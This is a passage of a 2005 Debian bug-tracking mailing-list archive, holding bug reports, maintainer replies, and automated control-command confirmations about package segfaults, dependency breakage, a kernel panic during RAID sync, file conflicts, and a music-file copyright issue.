27649 rt_sigaction(SIGTERM, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGQUIT, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGALRM, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGTSTP, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGTTOU, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGTTIN, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGWINCH, {SIG_DFL}, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGINT, NULL, {0x4002e7a0, [], SA_RESTORER, 
0x400c66f8}, 8) = 0
27649 rt_sigaction(SIGINT, {0x4002e7a0, [], SA_RESTORER, 0x400c66f8}, 
NULL, 8) = 0
27649 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
27649 +++ killed by SIGSEGV +++


-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27
Locale: LANG=en_US, LC_CTYPE=sv_SE (charmap=ISO-8859-1)

Versions of packages python2.3-ipython depends on:
ii  ipython-common0.6.15-1   enhanced interactive Python shell 
ii  python2.3 2.3.5-4An interactive high-level object-o

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: your mail

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tag 323578 +sarge
Bug#323578: drupal: DRUPAL-SA-2005-004
There were no tags set.
Tags added: sarge

 tag 323347 +sarge
Bug#323347: Another XMLRPC issue in drupal
Tags were: security
Tags added: sarge

 thank you
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Olivier Schwander
Josselin Mouette a écrit :
 Le mardi 30 août 2005 à 08:54 -0300, Gustavo Noronha Silva a écrit :
 
Em Ter, 2005-08-30 às 11:38 +0200, Olivier Schwander escreveu:

  ** (gnome-session:7151): WARNING **: Unable to read ICE authority
file: /home/olivier/.ICEauthority

A solution is to change owner/group of the file .ICEauthority from root:root
to username:username.

I think it is a problem in the preinst script.

preinst scripts are not supposed to mess up with your home directory;
how did that .ICEauthority arrive at your home directory in the first
place?

I bet it is not a problem in gnome-session, but some other thing that
messed up by writing that file there. Any ideas?
 
 
 It could be some GNOME program run as root with HOME=/home/olivier.

The problem appeared after an upgrade of gnome-session and a logout. But
  only one user is concerned: an .ICEauthority used by an other user
only with kde has a good owner.
I may have used Synaptic as root but I don't understand how it could
have bad $HOME. I tried with su and gksu but owner is preserved.
I know that I have not forced HOME=/home/olivier.





Processed: Bug#311119: aeromail can't login

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 retitle 39 aeromail: unusable with default PHP configuration
Bug#39: aeromail can't login
Changed Bug title.

 severity 39 serious
Bug#39: aeromail: unusable with default PHP configuration
Severity set to `serious'.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 318176 is grave, merging 318176 325651

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.5
 severity 318176 grave
Bug#318176: imagemagick in combination with transcode fails (amd64)
Severity set to `grave'.

 merge 318176 325651
Bug#318176: imagemagick in combination with transcode fails (amd64)
Bug#325651: ale: unable to open image `[mangled file name]': No such file or 
directory.
Mismatch - only Bugs in same state can be merged:
Values for `package' don't match:
 #318176 has `imagemagick';
 #325651 has `libmagick6'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 325720 is grave, merging 325720 325651

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.5
 severity 325720 grave
Bug#325720: File read error
Severity set to `grave'.

 merge 325720 325651
Bug#325651: ale: unable to open image `[mangled file name]': No such file or 
directory.
Bug#325720: File read error
Merged 325651 325720.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325714: python2.3-ipython: Segfault when entering any command.

2005-08-30 Thread Norbert Tretkowski
reassign 325714 python2.3
close 325714
thanks

* Peter Gebauer wrote:
 Typing any command and pressing enter results in a segfault. Please
 tell me if you need any additional information.

That's an already fixed bug in python2.3, hence I'm reassigning and
closing your bugreport.

Upgrade your python2.3 package to 2.3.5-6, which is available in
testing.

Thanks, Norbert


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#321669: marked as done (enigma: Copyright violation for menu.s3m)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 06:32:11 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#321669: fixed in enigma 0.92.1-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 6 Aug 2005 19:09:45 +
From [EMAIL PROTECTED] Sat Aug 06 12:09:45 2005
Return-path: [EMAIL PROTECTED]
Received: from mrelay3.uni-hannover.de [130.75.2.41] (root)
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1E1U3E-0005P4-00; Sat, 06 Aug 2005 12:09:44 -0700
Received: from mail.itp.uni-hannover.de (mail.itp.uni-hannover.de 
[130.75.25.242])
by mrelay3.uni-hannover.de (8.12.10/8.12.10) with ESMTP id 
j76J9cwE005077
for [EMAIL PROTECTED]; Sat, 6 Aug 2005 21:09:38 +0200 (MEST)
Received: from zibal.itp.uni-hannover.de (zibal.itp.uni-hannover.de 
[130.75.25.91])
by mail.itp.uni-hannover.de (Postfix) with ESMTP id 551A01B5F0
for [EMAIL PROTECTED]; Sat,  6 Aug 2005 21:09:34 +0200 (CEST)
Received: by zibal.itp.uni-hannover.de (Postfix, from userid 237)
id 21DA91A6C7; Sat,  6 Aug 2005 21:09:34 +0200 (CEST)
Date: Sat, 6 Aug 2005 21:09:34 +0200
From: Helge Kreutzmann [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: enigma: Copyright violation for menu.s3m
Message-ID: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
X-Public-Key-URL: http://www.itp.uni-hannover.de/~kreutzm/data/kreutzm.gpg
X-homepage: http://www.itp.uni-hannover.de/~kreutzm
X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.2.2 
(mrelay3.uni-hannover.de [130.75.2.41]); Sat, 06 Aug 2005 21:09:38 +0200 (MEST)
X-Scanned-By: MIMEDefang 2.42
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: enigma
Version: 0.81.1-2
Severity: serious
Justification: Policy 2.3

Policy says:
   Packages whose copyright permission notices (or patent problems) do
   not even allow redistribution of binaries only, and where no
   special permission has been obtained, must not be placed on the
   Debian FTP site and its mirrors at all.

   Note that under international copyright law (this applies in the
   United States, too), no distribution or modification of a work is
   allowed without an explicit notice saying so. Therefore a program
   without a copyright notice is copyrighted and you may not do anything
   to it without risking being sued! Likewise if a program has a
   copyright notice but no statement saying what is permitted then
   nothing is permitted.

Now look at menu.s3m in /usr/share/games/enigma/sound. If you play it 
(e.g, with mikmod), then you'll see the copyright:
  1  Pentagonal Dreams
  2
  3 by Necros / FM / LD
  4
  5
  6  Music (C) 1995 Necros / FM
  7
  8 All rights reserved.
  9
 10  Contact:
 11  [EMAIL PROTECTED]

I looked at copyright, copyright.enigma-data, README and README.Debian but
could not find any traces regarding this file nor a mention of Necros. I
also went to the web page you mention:
  http://www.nongnu.org/enigma/authors.html
and again, no trace of this name. 

So clearly, we are not allowed to distribute this file (or if you forgot to
include the copyright-message, then this needs to be added ASAP).

Btw. I love enigma and I hope this is a simple oversight somewhere!

-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.11.deb-7-grsec
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages enigma depends on:
ii  enigma-data   0.81.1-2   Data file for the game enigma
ii  libc6 2.3.2.ds1-22   GNU C Library: Shared libraries an
ii  libgcc1   1:3.4.3-13 GCC support library
ii  liblua40  4.0-13 Main interpreter library for the L
ii  liblualib40   4.0-13 Extension library for the Lua 4.0 
ii  libsdl-image1 1.2.4-1image loading library for Simple D
ii  libsdl-mixer1 1.2.6-1mixer library for Simple DirectMed
ii  libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii  libstdc++51:3.3.5-13 The GNU Standard C++ Library v3
ii  libtolua0 4.0a-3 

Processed: Re: Bug#325714: python2.3-ipython: Segfault when entering any command.

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 325714 python2.3
Bug#325714: python2.3-ipython: Segfault when entering any command.
Bug reassigned from package `python2.3-ipython' to `python2.3'.

 close 325714
Bug#325714: python2.3-ipython: Segfault when entering any command.
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to Peter Gebauer [EMAIL PROTECTED]

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 318176 to libmagick6, merging 318176 325651

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.5
 reassign 318176 libmagick6
Bug#318176: imagemagick in combination with transcode fails (amd64)
Bug reassigned from package `imagemagick' to `libmagick6'.

 merge 318176 325651
Bug#318176: imagemagick in combination with transcode fails (amd64)
Bug#325651: ale: unable to open image `[mangled file name]': No such file or 
directory.
Bug#325720: File read error
Merged 318176 325651 325720.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325725: libsdl-sound1.2: fails to install in a clean chroot

2005-08-30 Thread Matthijs Mohlmann
Package: libsdl-sound1.2
Severity: serious
Justification: Policy 7.2

Fails to install in a clean chroot:

monster:/# apt-get install libsdl-sound1.2
Reading package lists... Done
Building dependency tree... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  libsdl-sound1.2: Depends: libflac6 but it is not installable
E: Broken packages

Solution:
Rebuild against the newest libflac-dev and everything is fine again.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: drupal security bugs

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 close 323347 4.5.5-1
Bug#323347: Another XMLRPC issue in drupal
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug marked as fixed in version 4.5.5-1, send any further explanations to Moritz 
Muehlenhoff [EMAIL PROTECTED]

 close 323578 4.5.5-1
Bug#323578: drupal: DRUPAL-SA-2005-004
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug marked as fixed in version 4.5.5-1, send any further explanations to [EMAIL 
PROTECTED]

 --
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325726: kernel-image-2.6.8-11-amd64-generic: kernel panics/hangs (SATA related?)

2005-08-30 Thread Carl Johnstone
Package: kernel-image-2.6.8-11-amd64-generic
Version: 2.6.8-14
Severity: critical
Justification: breaks the whole system


Keep getting lockups, in particular whilst trying to sync a RAID5 array across 
several SATA drives.

Setting a RAID1 partition across the same drives seems to work OK though. I've 
managed to get one set of errors from the syslog:

Aug 30 13:20:18 boromir kernel: ata6: command 0x25 timeout, stat 0x50 host_stat 
0x61
Aug 30 13:20:18 boromir kernel: Assertion failed! qc-flags  
ATA_QCFLAG_ACTIVE,drivers/scsi/libata-core.c,ata_qc_complete,line=2315
Aug 30 13:20:18 boromir kernel: --- [cut here ] - [please bite 
here ] -
Aug 30 13:20:18 boromir kernel: Kernel BUG at scsi:284
Aug 30 13:20:18 kernel: invalid operand:  [1]
Aug 30 13:20:18 kernel: CPU 0
Aug 30 13:20:18 kernel: Modules linked in: nls_cp437 isofs evdev 8139cp shpchp 
pciehp pci_hotplug forcedeth ide_scsi psmouse genrtc
ext3 jbd raid5 xor raid0 eth1394 8139too mii sr_mod sbp2 sd_mod ide_cd cdrom 
ide_disk ide_generic pdc202xx_new aec62xx alim15x3 amd74xx atii
xp cmd64x cs5520 cs5530 cy82c693 generic hpt34x ns87415 opti621 pdc202xx_old 
piix rz1000 sc1200 serverworks siimage sis5513 slc90e66 triflex
 trm290 via82cxxx floppy usb_storage ide_core ohci1394 ieee1394 fbcon vga16fb 
vgastate usbserial usbkbd ehci_hcd ohci_hcd thermal processor
fan sata_sis sata_nv libata scsi_mod raid1 md unix font vesafb cfbcopyarea 
cfbimgblt cfbfillrect
Aug 30 13:20:18 kernel: Pid: 221, comm: scsi_eh_5 Not tainted 
2.6.8-11-amd64-generic
Aug 30 13:20:18 kernel: RIP: 0010:[_end+533152296/2133114880] 
a0028228{:scsi_mod:scsi_put_command+27}
Aug 30 13:20:18 kernel: RSP: 0018:01003f82bd98  EFLAGS: 00010046
Aug 30 13:20:18 kernel: RAX: 01003f9df000 RBX: 01003f9e09b0 RCX: 
01003e9b6ae0
Aug 30 13:20:18 kernel: RDX: 01003e9b6ae0 RSI: 01003f9e2000 RDI: 
01003e9b6ac0
Aug 30 13:20:18 kernel: RBP: 01003e9b6ac0 R08:  R09: 
00800150
Aug 30 13:20:18 kernel: R10: 0246 R11: 80146787 R12: 
0001
Aug 30 13:20:18 kernel: R13: 0001 R14: 01003f9e09b0 R15: 

Aug 30 13:20:18 kernel: FS:  002a958ab640() GS:80391580() 
knlGS:
Aug 30 13:20:18 kernel: CS:  0010 DS:  ES:  CR0: 8005003b
Aug 30 13:20:18 kernel: CR2: 002a955b2000 CR3: 00101000 CR4: 
06e0
Aug 30 13:20:18 kernel: Process scsi_eh_5 (pid: 221, threadinfo 
01003f82a000, task 01003f8049c0)
Aug 30 13:20:18 kernel: Stack: 0206 a002c739 
010039948990 a002c815
Aug 30 13:20:18 kernel:010039948990 0206 
0001 01003e9b6ac0
Aug 30 13:20:18 kernel:010039948990 
Aug 30 13:20:18 kernel: Call 
Trace:a002c739{:scsi_mod:scsi_next_command+14}
Aug 30 13:20:18 kernel:
a002c815{:scsi_mod:scsi_end_request+167}
Aug 30 13:20:18 kernel:
a002ca9a{:scsi_mod:scsi_io_completion+493}
Aug 30 13:20:18 kernel:
a004b8cf{:libata:ata_scsi_qc_complete+63}
Aug 30 13:20:18 kernel:a0049409{:libata:ata_qc_complete+278} 
a004b6ad{:libata:ata_scsi_error+16}
Aug 30 13:20:18 kernel:
a002b609{:scsi_mod:scsi_error_handler+284}
Aug 30 13:20:18 kernel:80110687{child_rip+8} 
a002b4ed{:scsi_mod:scsi_error_handler+0}
Aug 30 13:20:18 kernel:8011067f{child_rip+0}
Aug 30 13:20:18 kernel:
Aug 30 13:20:18 kernel: Code: 0f 0b 8d 1a 03 a0 ff ff ff ff 1c 01 48 8b 42 08 
48 89 41 08
Aug 30 13:20:18 kernel: RIP a0028228{:scsi_mod:scsi_put_command+27} 
RSP 01003f82bd98


-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.8-11-amd64-generic
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages kernel-image-2.6.8-11-amd64-generic depends on:
ii  coreutils [fileutils]   5.2.1-2  The GNU core utilities
ii  e2fsprogs   1.37-2sarge1 ext2 file system utilities and lib
ii  initrd-tools0.1.81.1 tools to create initrd image for p
ii  module-init-tools   3.2-pre1-2   tools for managing Linux kernel mo

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325701: gnome-session: unable to launch gnome due to bad group/owner on .ICEauthority

2005-08-30 Thread Gustavo Noronha Silva
Em Ter, 2005-08-30 às 14:45 +0200, Olivier Schwander escreveu:
 Josselin Mouette a écrit :
  It could be some GNOME program run as root with HOME=/home/olivier.
 
 The problem appeared after an upgrade of gnome-session and a logout. But
   only one user is concerned: an .ICEauthority used by an other user
 only with kde has a good owner.
 I may have used Synaptic as root but I don't understand how it could
 have bad $HOME. I tried with su and gksu but owner is preserved.
 I know that I have not forced HOME=/home/olivier.

Might be... I created a new user here tro try gksu +
$some_GNOME_programs here. I tried nautilus, evolution; I even invoked a
full gnome-session as root using gksu to try it out and make sure.
No .ICEauthority was created at all.

gksu does leave some variables like USERNAME and LOGNAME untouched,
though, so a misbehaving program could be the problem there. I tried
synaptic, though, and it works without creating a .ICEauthority.

Haven't you tried to run something else as root, using other means,
maybe?

See ya,

-- 
[EMAIL PROTECTED]: Gustavo Noronha http://people.debian.org/~kov
Debian:  http://www.debian.org  *  http://www.debian-br.org



signature.asc
Description: This is a digitally signed message part


Bug#325738: bison-doc must replace older versions of bison

2005-08-30 Thread Adrian Bunk
Package: bison-doc
Version: 1:2.0-2
Severity: serious

--  snip  --

Selecting previously deselected package bison-doc.
(Reading database ... 138894 files and directories currently installed.)
Unpacking bison-doc (from .../bison-doc_1%3a2.0-2_all.deb) ...
dpkg: error processing /var/cache/apt/archives/bison-doc_1%3a2.0-2_all.deb 
(--unpack):
 trying to overwrite `/usr/share/info/bison.info.gz', which is also in package 
bison
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Errors were encountered while processing:
 /var/cache/apt/archives/bison-doc_1%3a2.0-2_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

--  snip  --


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#310398: Update: version problems

2005-08-30 Thread Graham Smith
Note sure if this should be a separate bug report but it seems to be related 
to this issue. 

Although the above mentioned version mismatch has been fixed pgadmin still can 
not be installed. It seems to require exactly libwxgtk2.5.3 even though the 
dependencies indicate a later version (libwxgtk2.6-0 is in unstable) will 
work.

Graham


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#313324: not fixed in 1.2-3

2005-08-30 Thread ILF
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

hi

On Thu, 7 Jul 2005 18:47:05 Sven Luther [EMAIL PROTECTED] wrote:
 Thanks for the report, but this should be fixed in the 1.2-3 release.

no, it's not:

# apt-get install hardware-monitor
Reading package lists... Done
Building dependency tree... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  hardware-monitor: Depends: libgconfmm-2.6-1 (= 2.8.1) but it is not
installable
Depends: libglademm-2.4-1 but it is not installable
Depends: libglibmm-2.4-1 (= 2.6.1) but it is not
installable
Depends: libgnome-vfsmm-2.6-1 (= 2.8.0) but it is
not installable
Depends: libgnomecanvasmm-2.6-1 (= 2.8.0) but it is
not installable
Depends: libgnomemm-2.6-1 (= 2.8.0) but it is not
installable
Depends: libgnomeuimm-2.6-1 (= 2.8.0) but it is not
installable
Depends: libgtkmm-2.4-1 (= 1:2.4.11) but it is not
installable
Depends: libsigc++-2.0-0 (= 2.0.2) but it is not
installable
E: Broken packages

- --
Andre Meister

encrypt e-mails. use gnupg!  my key-id: 0x294DFE208B0C383A
fingerprint: 841C 3513 F09D 0CD6 8364 8F51 294D FE20 8B0C 383A
http://pgpkeys.pca.dfn.de:11371/pks/lookup?op=getsearch=0x294DFE208B0C383A
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDFIdoKU3+IIsMODoRAtFcAJ4wifTqRWzQ6t4ys4CLN1lNVwrL1ACgvJrM
pAOZPzNKfzwaAAvFtPlnDdI=
=wGBX
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#325725: marked as done (libsdl-sound1.2: fails to install in a clean chroot)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 09:17:07 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#325725: fixed in libsdl-sound1.2 1.0.1-8
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 30 Aug 2005 13:52:44 +
From [EMAIL PROTECTED] Tue Aug 30 06:52:44 2005
Return-path: [EMAIL PROTECTED]
Received: from openbsd.xs4all.nl (router.cacholong.nl) [80.126.240.96] 
(_postfix)
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EA6Xc-0006SG-00; Tue, 30 Aug 2005 06:52:44 -0700
Received: from monster.cacholong.nl (unknown [192.168.20.2])
by router.cacholong.nl (Postfix) with ESMTP id C21383E4;
Tue, 30 Aug 2005 15:52:38 +0200 (CEST)
Content-Type: text/plain; charset=us-ascii
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Matthijs Mohlmann [EMAIL PROTECTED]
To: Debian Bug Tracking System [EMAIL PROTECTED]
Subject: libsdl-sound1.2: fails to install in a clean chroot
X-Mailer: reportbug 3.17
Date: Tue, 30 Aug 2005 15:52:37 +0200
Message-Id: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Package: libsdl-sound1.2
Severity: serious
Justification: Policy 7.2

Fails to install in a clean chroot:

monster:/# apt-get install libsdl-sound1.2
Reading package lists... Done
Building dependency tree... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.

Since you only requested a single operation it is extremely likely that
the package is simply not installable and a bug report against
that package should be filed.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
  libsdl-sound1.2: Depends: libflac6 but it is not installable
E: Broken packages

Solution:
Rebuild against the newest libflac-dev and everything is fine again.

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

---
Received: (at 325725-close) by bugs.debian.org; 30 Aug 2005 16:19:00 +
From [EMAIL PROTECTED] Tue Aug 30 09:19:00 2005
Return-path: [EMAIL PROTECTED]
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
id 1EA8nL-0006AT-00; Tue, 30 Aug 2005 09:17:07 -0700
From: Ari Pollak [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#325725: fixed in libsdl-sound1.2 1.0.1-8
Message-Id: [EMAIL PROTECTED]
Sender: Archive Administrator [EMAIL PROTECTED]
Date: Tue, 30 Aug 2005 09:17:07 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: libsdl-sound1.2
Source-Version: 1.0.1-8

We believe that the bug you reported is fixed in the latest version of
libsdl-sound1.2, which is due to be installed in the Debian FTP archive:

libsdl-sound1.2-dev_1.0.1-8_i386.deb
  to pool/main/libs/libsdl-sound1.2/libsdl-sound1.2-dev_1.0.1-8_i386.deb
libsdl-sound1.2_1.0.1-8.diff.gz
  to pool/main/libs/libsdl-sound1.2/libsdl-sound1.2_1.0.1-8.diff.gz
libsdl-sound1.2_1.0.1-8.dsc
  to pool/main/libs/libsdl-sound1.2/libsdl-sound1.2_1.0.1-8.dsc
libsdl-sound1.2_1.0.1-8_i386.deb
  to pool/main/libs/libsdl-sound1.2/libsdl-sound1.2_1.0.1-8_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ari Pollak [EMAIL PROTECTED] (supplier of updated libsdl-sound1.2 package)

(This message was generated automatically at their request; if you
believe that there is a 

Bug#325726: kernel-image-2.6.8-11-amd64-generic: kernel panics/hangs (SATA related?)

2005-08-30 Thread Frederik Schueler
Hello,

2.6.8 has known issues with software-raid. You can try a newer kernel,
preferably linux-image-2.6.12-1-amd64-k8 from unstable - unless you are
using udev, then you need to uninstall udev first (or use a backport).

is this problem reproducible with a 2.6.12 debian kernel?

By the way: you should not use the -generic flavour wich is intended for
the debian installer only, but either the amd64-k8(-smp) or 
em64t-p4(-smp) flavours depending on your box having an amd or intel 
processor. those kernels are optimized for the respective architecture
(cache alignment, compiler options etc).

Best regards
Frederik Schueler

-- 
ENOSIG


signature.asc
Description: Digital signature


Processed: tagging 320120

2005-08-30 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 320120 + pending
Bug#320120: [PATCH] traceroute bus error on sparc
There were no tags set.
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#320120: marked as done ([PATCH] traceroute bus error on sparc)

2005-08-30 Thread Debian Bug Tracking System
Your message dated Tue, 30 Aug 2005 09:47:05 -0700
with message-id [EMAIL PROTECTED]
and subject line Bug#320120: fixed in traceroute 1.4a12-20
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--
Received: (at submit) by bugs.debian.org; 27 Jul 2005 05:53:32 +
From [EMAIL PROTECTED] Tue Jul 26 22:53:32 2005
Return-path: [EMAIL PROTECTED]
Received: from londo.c47.org [198.142.1.20] (mail)
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
